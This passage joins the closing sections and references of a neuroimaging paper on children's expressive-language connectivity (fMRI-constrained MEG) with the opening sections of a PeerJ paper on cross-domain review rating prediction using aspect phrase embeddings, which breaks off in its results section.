equivalent current dipole analysis, beamforming). The tasks used in each imaging modality were highly similar, but not identical. In fMRI, auditory noun stimuli were used; in MEG, pictures of everyday objects were pre- ferred. According to current language models, the auditory or visual stimuli preferentially engage their respective sensory cortices; however, both versions of the task will ul- timately require engagement of a broader stimulus modality- independent language network necessary for semantic processing, word retrieval, and articulatory planning related to verb generation (Price, 2012). Since the broad activation map was defined using an auditory fMRI paradigm, and ef- fective connectivity was assessed from MEG data collected using a visual paradigm, the resulting effective connectivity map should reflect only the elements of the expressive lan- guage network that are modality nonspecific. In this way, we isolate the language-specific subprocesses involved in verb generation. In the current analyses, we study information flux occur- ring between node pairs, without imparting any theoretical or anatomical restrictions on where network edges may be established. The data-driven approach is objective, but could potentially yield connectivity maps that do not reflect the underlying physiological structure of the language net- work. With the current approach, it is indeed possible to observe significant information flux between two regions that are not directly connected by any known fiber pathway. Furthermore, we limited our analyses to regions shown ac- tive in large-scale fMRI analyses; it is possible that nodes re- siding outside the defined network could also be involved in expressive language processing, particularly in individual subjects. These connections could not be resolved in the cur- rent analyses. It is important to note that the PSI metric requires specifi- cation of both time and frequency ranges for computation. In this study, we cropped our data to a time window known to be relevant for verb generation in children (Kadis et al., 2011) and restricted analyses to within canonical frequency bands. Had we assessed phase slope across the broadband data, we would have failed to capture the changing direction of information flux among left frontal nodes and missed the changing patterns of connectivity that occur across the spec- tra. The choice of temporal and spectral window is not triv- ial; with additional experience, we anticipate proposing guidelines so researchers can make informed decisions about the parameters used in effective connectivity analyses with PSI and related metrics. We are currently investigating other methods to integrate fMRI and MEG data, to map core language sites in healthy children and those undergoing investigations for epilepsy surgery. With continued development of multimodal neuro- imaging and connectivity analyses, we will gain access to a better understanding of normal language development, plas- ticity, and representation in the brain. Acknowledgments The fMRI data were obtained through support from the National Institute of Child Health and Human Development (R01-HD38578; S.K.H.), and the MEG data were obtained through support from the University of Toronto (D.S.K./ M.L.S.). The authors wish to acknowledge Akila Rajagopal and Thomas Maloney for their technical assistance with the study. Author Disclosure Statement No competing financial interests exist. References Ballantyne AO, Spilkin AM, Hesselink J, Trauner DA. 2008. Plasticity in the developing brain: intellectual, language and academic functions in children with ischaemic perinatal stroke. Brain 131:2975–2985. Bates E, Reilly J, Wulfeck B, Dronkers N, Opie M, Fenson J, et al. 2001. Differential effects of unilateral lesions on lan- guage production in children and adults. Brain Lang 79: 223–265. Branch C, Milner B, Rasmussen T. 1964. Intracarotid sodium amytal for the lateralization of cerebral speech dominance; observations in 123 patients. J Neurosurg 21:399–405. Brazdil M, Zakopcan J, Kuba R, Fanfrdlova Z, Rektor I. 2003. Atypical hemispheric language dominance in left temporal lobe epilepsy as a result of the reorganization of language functions. Epilepsy Behav 4:414–419. Broca PP. 1861. Remarques sur le siége de la faculté du langage articulé, suivies d’une observation d’aphémie (perte de la pa- role). Bulletin de la Société Anthropologique 6:330–357. Brown TT, Lugar HM, Coalson RS, Miezin FM, Petersen SE, Schlaggar BL. 2005. Developmental changes in human cere- bral functional organization for word generation. Cereb Cor- tex 15:275–290. Craddock RC, James GA, Holtzheimer PE, 3rd, Hu XP, Mayberg HS. 2012. A whole brain fMRI atlas generated via spatially constrained spectral clustering. Hum Brain Mapp 33:1914–1928. Geschwind N. 1970. The organization of language and the brain. Science 170:940–944. Geschwind N. 1972. Language and the brain. Sci Am 226: 76–83. Gummadavelli A, Wang Y, Guo X, Pardos M, Chu H, Liu Y, et al. 2013. Spatiotemporal and frequency signatures of word recognition in the developing brain: a magnetoencepha- lographic study. Brain Res 1498:20–32. Haufe S, Nikulin VV, Muller KR, Nolte G. 2013. A critical as- sessment of connectivity measures for EEG data: a simula- tion study. Neuroimage 64:120–133. Helmstaedter C, Kurthen M, Linke DB, Elger CE. 1997. Patterns of language dominance in focal left and right hemisphere ep- ilepsies: relation to MRI findings, EEG, sex, and age at onset of epilepsy. Brain Cogn 33:135–150. Holland SK, Plante E, Weber Byars A, Strawsburg RH, Schmi- thorst VJ, Ball WS, Jr. 2001. Normal fMRI brain activation patterns in children performing a verb generation task. Neu- roimage 14:837–843. Holland SK, Vannest J, Mecoli M, Jacola LM, Tillema JM, Karunanayaka PR, et al. 2007. Functional MRI of language lateralization during development in children. Int J Audiol 46:533–551. 82 KADIS ET AL. Jacola LM, Schapiro MB, Schmithorst VJ, Byars AW, Straws- burg RH, Szaflarski JP, et al. 2006. Functional magnetic res- onance imaging reveals atypical language organization in children following perinatal left middle cerebral artery stroke. Neuropediatrics 37:46–52. Kadis DS, Iida K, Kerr EN, Logan WJ, McAndrews MP, Ochi A, et al. 2007. Intrahemispheric reorganization of language in children with medically intractable epilepsy of the left hemi- sphere. J Int Neuropsychol Soc 13:505–516. Kadis DS, Kerr EN, Rutka JT, Snead OC, 3rd, Weiss SK, Smith ML. 2009. Pathology type does not predict language lateral- ization in children with medically intractable epilepsy. Epi- lepsia 50:1498–1504. Kadis DS, Pang EW, Mills T, Taylor MJ, McAndrews MP, Smith ML. 2011. Characterizing the normal developmental trajectory of expressive language lateralization using magne- toencephalography. J Int Neuropsychol Soc 17:896–904. Kadis DS, Smith ML, Mills T, Pang EW. 2008. Expressive lan- guage mapping in children using MEG; MEG localization of expressive language cortex in healthy children: application to paediatric clinical populations. Down Syndr Q 10:5–12. Karunanayaka P, Schmithorst VJ, Vannest J, Szaflarski JP, Plante E, Holland SK. 2010. A group independent component analysis of covert verb generation in children: a functional magnetic resonance imaging study. Neuroimage 51:472–487. Karunanayaka P, Schmithorst VJ, Vannest J, Szaflarski JP, Plante E, Holland SK. 2011. A linear structural equation model for covert verb generation based on independent com- ponent analysis of FMRI data from children and adolescents. Front Syst Neurosci 5:29. McCarthy G, Blamire AM, Rothman DL, Gruetter R, Shulman RG. 1993. Echo-planar magnetic resonance imaging stud- ies of frontal cortex activation during word generation in humans. Proc Natl Acad Sci U S A 90:4952–4956. Nolte G, Muller KR. 2010. Localizing and estimating causal re- lations of interacting brain rhythms. Front Hum Neurosci 4:209. Nolte G, Ziehe A, Nikulin VV, Schlogl A, Kramer N, Brismar T, et al. 2008. Robustly estimating the flow direction of infor- mation in complex physical systems. Phys Rev Lett 100: 234101. Oldfield RC. 1971. The assessment and analysis of handedness: the Edinburgh inventory. Neuropsychologia 9:97–113. Oostenveld R, Fries P, Maris E, Schoffelen JM. 2011. FieldTrip: Open source software for advanced analysis of MEG, EEG, and invasive electrophysiological data. Comput Intell Neuro- sci 2011:156869. Pang EW, Wang F, Malone M, Kadis DS, Donner EJ. 2011. Local- ization of Broca’s area using verb generation tasks in the MEG: validation against fMRI. Neurosci Lett 490:215–219. Price CJ. 2012. A review and synthesis of the first 20 years of PET and fMRI studies of heard speech, spoken language and reading. Neuroimage 62:816–847. Rasmussen T, Milner B. 1977. The role of early left-brain injury in determining lateralization of cerebral speech functions. Ann N Y Acad Sci 299:355–369. Reilly JS, Bates EA, Marchman VA. 1998. Narrative discourse in children with early focal brain injury. Brain Lang 61: 335–375. Ressel V, Wilke M, Lidzba K, Lutzenberger W, Krageloh-Mann I. 2008. Increases in language lateralization in normal chil- dren as observed using magnetoencephalography. Brain Lang 106:167–176. Saltzman-Benaiah J, Scott K, Smith ML. 2003. Factors associ- ated with atypical speech representation in children with in- tractable epilepsy. Neuropsychologia 41:1967–1974. Satz P, Strauss E, Wada J, Orsini DL. 1988. Some correlates of intra- and interhemispheric speech organization after left focal brain injury. Neuropsychologia 26:345–350. Schmithorst VJ, Dardzinski B. 2000. CCHIPS/IDL enables de- tailed MRI analyses. Schmithorst VJ, Dardzinski BJ, Holland SK. 2001. Simultane- ous correction of ghost and geometric distortion artifacts in EPI using a multiecho reference scan. IEEE Trans Med Imag- ing 20:535–539. Szaflarski JP, Holland SK, Schmithorst VJ, Byars AW. 2006. fMRI study of language lateralization in children and adults. Hum Brain Mapp 27:202–212. Talairach J, Tournoux P. 1988. Co-planar Stereotaxic Atlas of the Human Brain: 3-Dimensional Proportional System: An Approach to Cerebral Imaging. New York: Thieme. Thevenaz P, Ruttimann UE, Unser M. 1998. A pyramid ap- proach to subpixel registration based on intensity. IEEE Trans Image Process 7:27–41. Tillema JM, Byars AW, Jacola LM, Schapiro MB, Schmithorst VJ, Szaflarski JP, et al. 2008. Cortical reorganization of lan- guage functioning following perinatal left MCA stroke. Brain Lang 105:99–111. Vargha-Khadem F, Watters GV, O’Gorman AM. 1985. Devel- opment of speech and language following bilateral frontal le- sions. Brain Lang 25:167–183. Address correspondence to: Darren S. Kadis PNRC and Division of Neurology Cincinnati Children’s Hospital Medical Center 3333 Burnet Avenue Cincinnati, OH 45229 E-mail: darren.kadis@cchmc.org MAPPING EFFECTIVE CONNECTIVITY WITH FMRI-CONSTRAINED MEG 83 work_k5zsbz3e7jfnxis6togjuxtjze ---- Submitted 25 April 2019 Accepted 6 September 2019 Published 7 October 2019 Corresponding author Aiqi Jiang, A.Jiang.2@warwick.ac.uk, aiqi.jiang@yahoo.com Academic editor Eibe Frank Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.225 Copyright 2019 Jiang and Zubiaga Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Leveraging aspect phrase embeddings for cross-domain review rating prediction Aiqi Jiang1 and Arkaitz Zubiaga2 1 University of Warwick, Coventry, United Kingdom 2 Queen Mary University of London, London, United Kingdom ABSTRACT Online review platforms are a popular way for users to post reviews by expressing their opinions towards a product or service, and they are valuable for other users and companies to find out the overall opinions of customers. These reviews tend to be accompanied by a rating, where the star rating has become the most common approach for users to give their feedback in a quantitative way, generally as a Likert scale of 1–5 stars. In other social media platforms like Facebook or Twitter, an automated review rating prediction system can be useful to determine the rating that a user would have given to the product or service. Existing work on review rating prediction focuses on specific domains, such as restaurants or hotels. This, however, ignores the fact that some review domains which are less frequently rated, such as dentists, lack sufficient data to build a reliable prediction model. In this paper, we experiment on 12 datasets pertaining to 12 different review domains of varying level of popularity to assess the performance of predictions across different domains. We introduce a model that leverages aspect phrase embeddings extracted from the reviews, which enables the development of both in-domain and cross-domain review rating prediction systems. Our experiments show that both of our review rating prediction systems outperform all other baselines. The cross-domain review rating prediction system is particularly significant for the least popular review domains, where leveraging training data from other domains leads to remarkable improvements in performance. The in-domain review rating prediction system is instead more suitable for popular review domains, provided that a model built from training data pertaining to the target domain is more suitable when this data is abundant. Subjects Artificial Intelligence, Computational Linguistics, Data Science, Natural Language and Speech Keywords Aspect phrase embeddings, Review rating prediction, Sentiment analysis, Social media, Cross-domain reviews, Yelp, Amazon, TripAdvisor, Word embeddings, Multinomial logistic regression INTRODUCTION In recent years, the advent and the prevalent popularisation of social media has led to a change in users’ habits of surfing the Internet (Kaplan & Haenlein, 2010; Quan-Haase & Young, 2010; Perrin, 2017; Goss, 2017). Since the emergence of social media platforms, Internet users are no longer limited to browsing online contents as mere readers, but they also can also contribute by expressing and sharing their opinions (Salehan, Zhang & Aghakhani, 2017). Users can freely post comments and share experiences on target entities How to cite this article Jiang A, Zubiaga A. 2019. Leveraging aspect phrase embeddings for cross-domain review rating prediction. PeerJ Comput. Sci. 5:e225 http://doi.org/10.7717/peerj-cs.225 https://peerj.com/computer-science/ mailto:A.Jiang.2@warwick.ac.uk mailto:aiqi.jiang@yahoo.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.225 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.225 such as products, businesses or events on online review platforms like http://Yelp.com or http://Amazon.com (Salehan & Kim, 2016; Xing et al., 2019). These reviews present the subjective opinions of people on products or businesses, which are invaluable for consumers and companies (Sparks & Browning, 2011). Given the volume of these reviews and the fact that they are spread on different sites across the Internet, it becomes more challenging and costly to aggregate all the reviews on a particular product or business (Zhang & Qu, 2013). To alleviate the cost of this task, there is a need to explore the development of automated review rating prediction systems. There has been work in the scientific literature looking at review rating prediction (Li et al., 2011; Fan & Khademi, 2014; Seo et al., 2017a; Wang et al., 2018; Xing et al., 2019; Wang et al., 2019). This work has however been limited to the prediction of ratings of reviews in very popular domains, such as restaurants (Ganu, Elhadad & Marian, 2009; Zhang et al., 2018; Laddha & Mukherjee, 2018; Xing et al., 2019), hotels (Zhao, Qian & Xie, 2016; Laddha & Mukherjee, 2018) or movies (Ning et al., in press). For these domains, it is relatively easy to get a large-scale dataset from online sources for training a review rating prediction system, thanks to sites like TripAdvisor or Yelp where large collections of rated reviews are publicly accessible. The task can however become more challenging for less popular domains, where the dearth of rated reviews available online inevitably means that the scarcity of labelled data available to train a rating prediction model will be rather limited. Moreover, the variance in vocabulary across different domains makes it more difficult to develop a prediction system that generalises to different domains; while reviewers are expected to use phrases like well written or entertaining book to express that they liked a book, a different vocabulary is expected to indicate that they liked a dentist, such as careful treatment or clean office. Our work builds on the idea that these phrases, associated with different aspects that vary across domains, can be effectively leveraged for the review rating prediction if the barriers between domains are reduced. To the best of our knowledge, review rating prediction for non-popular domains has not been studied in previous work, and our work is the first attempt to do so. We propose to pursue review rating prediction for non-popular domains by developing a cross-domain rating prediction system, where rated reviews from popular domains can be leveraged to build a model which can then be generalised to non-popular domains. To facilitate and ensure the effectiveness of building a model that will generalise to other domains, we propose an approach for generating aspect phrase embeddings and polarised aspect phrase embeddings, where phrases that vary across domains can be brought to a common semantic space by using word embeddings. In this work we make the following contributions: • We introduce the first cross-domain review rating prediction system that creates semantic representations of aspect phrases using word embeddings to enable training from large-scale, popular domains, to then be applied to less popular domains where labelled data is limited. • We perform experiments with 12 datasets pertaining to 12 different types of businesses of different levels of popularity. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 2/21 https://peerj.com http://Yelp.com http://Amazon.com http://dx.doi.org/10.7717/peerj-cs.225 • Our analysis shows that, while an in-domain review rating prediction system is better for popular domains, for the least popular domains our cross-domain review rating prediction system leads to improved performance when we make use of aspect phrase embeddings. • Different from an in-domain prediction system, our cross-domain system can be effectively applied to a wide range of product domains found on the Internet that do not necessarily have proper review rating systems to collect labelled data from. • Our classifier outperforms the results of A3NCF (Cheng et al., 2018), a state-of-the-art rating prediction system, in 11 out of 12 domains, showing its generalisability across domains of different levels of popularity. RELATED WORK There has been a body of research in sentiment analysis in recent years (Liu & Zhang, 2012). This research has worked in different directions by looking into lexicon-based approaches (Hu & Liu, 2004; Taboada et al., 2011), machine learning methods (Pang, Lee & Vaithyanathan, 2002; Ye, Zhang & Law, 2009; Tripathy, Agrawal & Rath, 2016) and deep learning techniques (Wang et al., 2016; Poria et al., 2017; Zhang, Wang & Liu, 2018; Xing et al., 2019). Different from the sentiment analysis task, the review rating prediction task consists of determining the score—as a rating between 1 and 5—that a user would give to a product or business, having the review text as input. While this may at first seem like a fine-grained sentiment analysis task, which is a translation of a textual view to a numerical perspective and consists of choosing one of five labels rather than three labels (positive, neutral, negative), there are two key characteristics that make the review rating prediction task different. First, the sentiment of a review is not necessarily the same as the rating, as a user may express a positive attitude when sharing a low rating opinion of a business, e.g., ‘‘I very much enjoyed my friend’s birthday celebration, however the food here is below standard and we won’t be coming back’’. And second, a review tends to discuss different aspects of a business, some of which may be more important than others towards the rating score, e.g., in a review saying that ‘‘the food was excellent and we loved the service, although that makes the place a bit pricey’’, a user may end up giving it a relatively high score given that key aspects such as the food and the service were considered very positive. In addition, the review can discuss different aspects, and the set of aspects discussed in each review can vary, with some users not caring about certain aspects; e.g., one user focuses on food while another one focuses more on price (Ganu, Elhadad & Marian, 2009). Using the same star rating mode to express the score of specific features can be more helpful to find users’ interests. Hence, we argue that a review rating prediction system needs to consider the opinions towards different aspects of a business. We achieve this by extracting aspect phrases mentioned in different sentences or segments of a review, which are then aggregated to determine the overall review rating. Despite the increasing volume of research in review rating prediction, which we discuss in what follows, research in cross-domain review rating prediction is still unstudied. This is particularly important for less popular review domains where labelled data is scarce and hence one may need to exploit labelled data from a different, more popular domain for training a classifier. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Review rating prediction has commonly been regarded as a classification task, but also as a regression task on a few occasions (Li et al., 2011; Pang & Lee, 2005; Mousavizadeh, Koohikamali & Salehan, 2015). The text of the review is the input that is consistently used by most existing works (Qu, Ifrim & Weikum, 2010; Leung, Chan & Chung, 2006; Mousavizadeh, Koohikamali & Salehan, 2015), however many of them also incorporate other features extracted from the product being reviewed or from the user writing the review (Qu, Ifrim & Weikum, 2010). Ganu, Elhadad & Marian (2009) improved the review rating prediction accuracy by implementing new ad-hoc and regression-based recommendation measures, where the aspect of user reviews is considered; their study was however limited to only restaurant reviews and other domains were not studied. A novel kind of bag-of-opinions representation (Qu, Ifrim & Weikum, 2010) was proposed and each opinion consists of three parts, namely a root term, a set of modifier terms from the same sentence, and one or more negation terms. This approach shows a better performance than prior state-of-the-art techniques for review rating prediction. Datasets including three review domains were used for their experiments, however they ran separate experiments for each domain and did not consider the case of domains lacking training data. Similarly, Wang, Lu & Zhai (2010) performed experiments predicting the ratings of hotel reviews, using a regression model that looked at different aspects discussed in a review, with the intuition that different aspects would have different levels of importance towards determining the rating. Recent years have seen an active interest in researching approaches to review rating prediction but are still limited to popular domains and do not consider the case of domains lacking training data. In a number of cases, features extracted from products and users are being used (Jin et al., 2016; Lei, Qian & Zhao, 2016; Seo et al., 2017b; Wang et al., 2018), which limits the ability to apply a prediction system to new domains and to unseen products and users. Tang et al. (2015) studied different ways of combining features extracted from the review text and the user posting the review. They introduced the User-Word Composition Vector Model (UWCVM), which considers the user posting a review to determine the specific use that a user makes of each word. While this is a clever approach to consider differences across users, it also requires observing reviews posted by each user beforehand, and cannot easily generalise to new, unseen users, as well as to new review domains where we lack any information about those users. An approach that predicts review ratings from the review text alone is that by Fan & Khademi (2014). They performed a study of two kinds of features: bag-of-words representations of reviews, as well as part-of-speech tags of the words in the review. They studied how the top K keywords in a dataset contributed to the performance of the rating prediction system, finding that a multinomial logistic regression classifier using the top 100 keywords performed best. Others have used topic modelling techniques like LDA or PLSA to identify the aspects that users discuss in restaurant reviews; however, they did not study their effectiveness for review rating prediction (Titov & McDonald, 2008; Huang, Rogers & Joo, 2014; Zhou, Wan & Xiao, 2015; Vargas & Pardo, 2018). One of the most recent methods by Cheng et al. (2018) combines topic modelling with a neural network classifier. The approach, called A 3NCF, extracts users’ preferences and Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 items’ characteristics on different aspects from reviews. An LDA topic modelling layer is used to then generate topic-specific representations of users and items. Subsequently, the method uses an attention network which combines these user and item features extracted from reviews. This method is shown to outperform an earlier method by Catherine & Cohen (2017), called TransNet, which uses two convolutional neural networks to learn latent representations of users and items. We will use the approach by Cheng et al. (2018), namely A3NCF, as a state-of-the-art baseline classifier. In this paper, we propose to perform a textual analysis of reviews that goes beyond the sole exploration of the whole text as a unit. Our method also looks at the aspect phrases mentioned in the text, which contain the core opinionated comments. This is the case of good food for a restaurant or comfortable bed for a hotel. While these differ substantially across review domains, we propose to leverage aspect phrase embeddings to achieve representations of aspect phrases to enable generalisation. This allows us to perform cross-domain review rating experiments, where one can build a rating prediction model out of larger training data thanks to leveraging labelled data from other domains. To the best of our knowledge, ours is the first work to perform rating predictions for review domains with scarce training data, such as dentists, as well as the first to propose and test a cross-domain review rating prediction system. DATASETS To enable our analysis of review rating prediction over different domains, we make use of 12 different datasets, each associated with a different domain. We use three different data sources to generate our datasets: (1) a publicly available collection of 6 million reviews from Yelp (https://www.yelp.com/dataset), (2) a collection of more than 142 million reviews from Amazon provided by McAuley et al. (2015); He & McAuley (2016), and (3) a collection of more than 24 million reviews retrieved from businesses listed in TripAdvisor’s top 500 cities. We filter 12 categories of reviews from these 3 datasets, which gives us 12 different datasets that enable us to experiment with review rating prediction over 12 different types of businesses and products. All of the datasets include both the review text and the review rating in a scale from 1 to 5. The use of a standardised 1–5 rating scale facilitates experimentation of rating prediction systems across domains. Table 1 shows the list of 12 datasets we use for our experimentation. Our datasets comprise more than 58 million reviews overall, distributed across different types of businesses, where some businesses are far more popular than others. The number of reviews per type of business ranges from 22 million reviews for books to 36,000 reviews for dentists, showing a significant imbalance in the size and popularity of different domains. The variability of dataset sizes and popularity of review domains enables our analysis looking at the effect of the availability of large amounts of in-domain data for training. In Fig. 1 we show a breakdown of the 1–5 star ratings for each dataset. We observe an overall tendency of assigning high ratings across most categories, except in the cases of casinos and resorts, where the ratings are more evenly distributed. Most categories show an upwards tendency with higher number of reviews for higher ratings, as is the case with Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 5/21 https://peerj.com https://www.yelp.com/dataset http://dx.doi.org/10.7717/peerj-cs.225 Table 1 Details of the 12 datasets, sorted by number of reviews. The number of reviews that each type of business/product receives varies drastically. Business/product Source # Reviews Books Amazon 22,507,155 Restaurants TripAdvisor 14,542,460 Attractions TripAdvisor 6,358,253 Clothing Amazon 5,748,920 Homeware Amazon 4,253,926 Hotels TripAdvisor 3,598,292 Nightlife Yelp 877,352 Events Yelp 387,087 Casinos Yelp 115,703 Hair salons Yelp 99,600 Resorts Yelp 57,678 Dentists Yelp 36,600 TOTAL – 58,583,026 A ttr ac tio ns B oo ks C as in os C lo th in g D en tis ts E ve nt s H ai r s al on s H om ew ar e H ot el s N ig ht lif e R es or ts R es ta ur an ts 0 20 40 60 80 100 5 stars 4 stars 3 stars 2 stars 1 star Figure 1 Distributions of star ratings in the 12 datasets. . Full-size DOI: 10.7717/peerjcs.225/fig-1 attractions, books or restaurants. Interestingly, in the case of dentists and hair salons, the ratings that prevail are 1′s and 5′s, showing that users tend to either love or hate these services. METHODOLOGY One of the key challenges of dealing with reviews pertaining to different domains is that the vocabulary can vary significantly. We can expect that people will express that they like or dislike a product in different ways for different domains. For example, one may make a reference to good food when reviewing a restaurant, a comfortable bed for a hotel, an inspiring novel for a book and a fun party for an event. All of these could be deemed Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 6/21 https://peerj.com https://doi.org/10.7717/peerjcs.225/fig-1 http://dx.doi.org/10.7717/peerj-cs.225 similarly positive for each domain, however without a proper method to capture these semantics, predictions made across domains may not be accurate enough. To tackle this problem, we propose to use aspect phrase embeddings. Aspect phrase extraction and representation Different review domains tend to have different aspect categories associated with them. While one may care about food quality in restaurants, the focus is instead on the engagement when reviewing a book. Even if other aspect categories such as price are more widely generalisable across domains, most aspect categories and associated vocabulary vary across domains. In the first instance, we are interested in capturing those phrases associated with aspect categories, which we refer to aspect phrases. We define aspect phrases as tuples providing opinionated judgement of a particular aspect of a product, e.g., excellent food for restaurants or interesting reading for books. Once we have these tuples, in a second step we use word embeddings to achieve a generalisable semantic representation of the aspect phrases. Aspect phrase extraction To extract the tuples corresponding to aspect phrases from the reviews, we rely on the assumption that these opinionated tuples will be made of (1) a sentiment word that judges the object or action concerned and (2) a non-sentiment word that refers to the object or action being judged. To restrict the context in which a tuple can be observed, we consider segments of the reviews, i.e., sentences or parts of sentences that are independent from each other. We perform the extraction of aspect phrases by following the next steps: 1. POS tagging: We extract the part-of-speech (POS) tags of all words in the reviews by using NLTK’s POS tagger (Bird & Loper, 2004), hence labelling each word as a noun, verb, adjective, adverb, etc. 2. Identification of sentiment words: We use the sentiment lexicon generated by Hu & Liu (2004), which provides a list of over 6,800 words associated with positive or negative sentiment. With this list, we tag matching keywords from reviews as being positive or negative. 3. Segmentation of reviews: We break down the reviews into segments. To identify the boundaries of segments, we rely on punctuation signs (, . ; :) and coordinating conjunctions (for, and, nor, but, or, yet, so) as tokens indicating the end of a segment. Text at either side of these tokens are separated into different segments. 4. Extraction of aspect phrases: At this stage, we only act within the boundaries of each segment. Within each segment, we identify pairs of words made of (1) a sentiment word labelled as positive or negative and (2) a word labelled as noun or verb by the POS tagger and identified as a non-sentiment word, i.e., not matching any of the keywords in the sentiment lexicon. Each pair of words matching these criteria within a segment is extracted as a tuple pertaining to an aspect phrase. Through the process above, we extract aspect phrases for all review domains. Table 2 shows the most salient aspect phrases for each of the review domains. We observe that aspect phrases vary substantially across domains, with phrases referring to the ease of use Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Table 2 List of most salient aspect phrases for the 12 review categories. Category Top aspect phrases Books (great, book) (good, book) (like, book) (recommend, book) (well, written) Restaurants (good, food) (good, was) (delicious, was) (great, food) (good, service) Attractions (worth, visit) (beautiful, is) (worth, is) (free, is) (attraction, is) Clothing (comfortable, are) (well, made) (worn, have) (perfectly, fit) (love, shoes) Homeware (easy, clean) (easy, use) (great, works) (well, works) (stainless, steel) Hotels (nice, hotel) (good, hotel) (great, hotel) (recommend, hotel) (clean, was) Nightlife (happy, hour) (good, was) (pretty, was) (good, were) (good, food) Events (nice, was) (clean, was) (pretty, was) (clean, room) (nice, room) Casinos (nice, was) (nice, room) (like, casino) (like, room) (clean, room) Hair salons (great, hair) (like, hair) (amazing, hair) (best, hair) (recommend, salon) Resorts (grand, mgm) (lazy, river) (nice, was) (nice, room) (like, room) Dentists (best, dentist) (wisdom, teeth) (work, done) (clean, office) (recommend, office) for homeware, comfort for clothing, food quality for restaurants or happy hour for nightlife, among others. Aspect phrase representation Despite the ability of our method above to capture aspect phrases independent of the domain, these still vary in terms of vocabulary. To achieve semantic representations of aspect phrases extracted for different domains, we make use of Word2Vec word embeddings (Mikolov et al., 2013). We train a word embedding model using the 58 million reviews in our datasets. This model is then used to achieve semantic representations of the aspect phrases with the following two variants: • Aspect Phrase Embeddings (APE): we aggregate all the aspect phrases extracted for a review. We generate the embedding vector for each review by adding up the word embeddings for all words included in those phrases. • Polarised Aspect Phrase Embeddings (PAPE): we aggregate the aspect phrases for a review in two separate groups, one containing positive phrases and the other containing negative phrases. Following the same method as for aspect phrase embeddings, here we generate a separate embedding representation for each group, which leads to an embedding representation for positive aspect phrases and another embedding Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 representation for negative aspect phrases. We then concatenate both embeddings to get the combined vector. Experiment settings Cross-validation We perform different sets of experiments for comparing the performance of our rating prediction systems in in-domain and cross-domain settings for different domains. As we are interested in performing 10-fold cross-validation experiments for both settings, we randomly split the data available for each domain d ∈{1..12} into 10 equally sized folds, f ∈{1..10}. Each time one of these folds is considered as the test data, Testij, while the training data depends on the setting, i.e., (1) ∑ ∀f∈{1..10},f 6=j,d=iTraindf for in-domain experiments, and (2) ∑ ∀d∈{1..12},d 6=i,f=jTraindf for cross-domain experiments. We ultimately average the performance scores across all 10 folds in each setting. Classifiers In setting up the experiments for our analysis, we tested all the classifiers proposed by Fan & Khademi (2014) and some more, including a multinomial Logistic Regression, a Gaussian Naive Bayes classifier, Support Vector Machines and Random Forests. Our experiments showed that the multinomial Logistic Regression was clearly and consistently the best classifier, and hence for the sake of clarity and brevity we report results using this classifier in the paper. Features and baselines We implement four different sets of features, which include two baselines and two methods that we propose: • Baseline (A3NCF): Introduced by Cheng et al. (2018), A3NCF is a model that extracts users’ preferences and items’ characteristics on different aspects from reviews. They introduce an attention network which utilises these user and item features extracted from reviews, which aims to capture the attention that a user pays to each aspect of an item in a review. In the absence of cross-domain rating prediction systems in previous work, we use A3NCF as the state-of-the-art rating prediction system to beat. • Baseline using Word Embeddings (w2v): we implement a second baseline consisting of a word embedding representation of the entire text of a review by averaging all the embeddings. We use the word embedding model we trained from our review datasets, which serves as a comparable baseline to measure the impact of aspect phrase embeddings on the performance of the rating prediction system. • Aspect Phrase Embeddings (APE): we concatenate the word embedding vectors obtained for the entire texts of reviews with the aspect phrase embeddings, i.e., word embedding representations of the aspect phrases extracted from a review. • Polarised Aspect Phrase Embeddings (PAPE): we concatenate the word embedding vectors obtained for the entire texts of reviews with the polarised aspect phrase embeddings, i.e., a concatenation of the word embedding representations of positive aspect phrases and the word embedding representation of negative aspect phrases. Jiang and Zubiaga (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.225 9/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.225 Note that baseline methods from more recent works are not directly applicable to our task as they make use of user data, which is not applicable in cross-domain scenarios where users are different across domains and platforms. Because our objective is to build a review rating prediction system that would then be applicable to other sources on the Web, relying on user metadata is not realistic, given that we often do not know the author of a text on the Web or the authors are different from those in the training data. Hence, we use the state-of-the-art text-only review rating prediction system by Fan & Khademi (2014), as well as a baseline using word embeddings, which enables direct comparison with the use of aspect phrase embeddings as additional features. Evaluation The review rating prediction task can be considered as a rating task with five different stars from 1 to 5. As a rating task, we need to consider the proximity between the predicted and reference ratings. For instance, if the true star rating of a review is 4 stars, then the predicted rating of 3 stars will be better than a predicted rating of 2 stars. To account for the difference or error rate between the predicted and reference ratings, we rely on the two metrics widely used in previous rating prediction work (Li et al., 2011): the Root Mean Square Error (RMSE) (see Eq. (1)) and Mean Absolute Error (MAE) (see Eq. (2)). RMSE= √∑n i=1(ŷi−ri) 2 n (1) MAE= ∑n i=1 ∣∣yi−ri∣∣ n (2) where: n denotes the total number of reviews in the test set. yi is the predicted star rating for the ith review. ri is the real star rating given to the ith review by the user. We report both metrics for all our experiments, to facilitate the comparison for future work. RESULTS The results are organised in two parts. First, we present and analyse results for in-domain review rating prediction, where the training and test data belong to the same domain. Then, we show and analyse the results for cross-domain review rating prediction, where data from domains that differ from the test set is used for training. A comparison of the performance on both settings enables us to assess the suitability of leveraging a cross-domain classifier as well as the use of aspect phrase embeddings. In-domain review rating prediction Tables 3 and 4 show results for in-domain review rating prediction, where the training and test data belong to the same 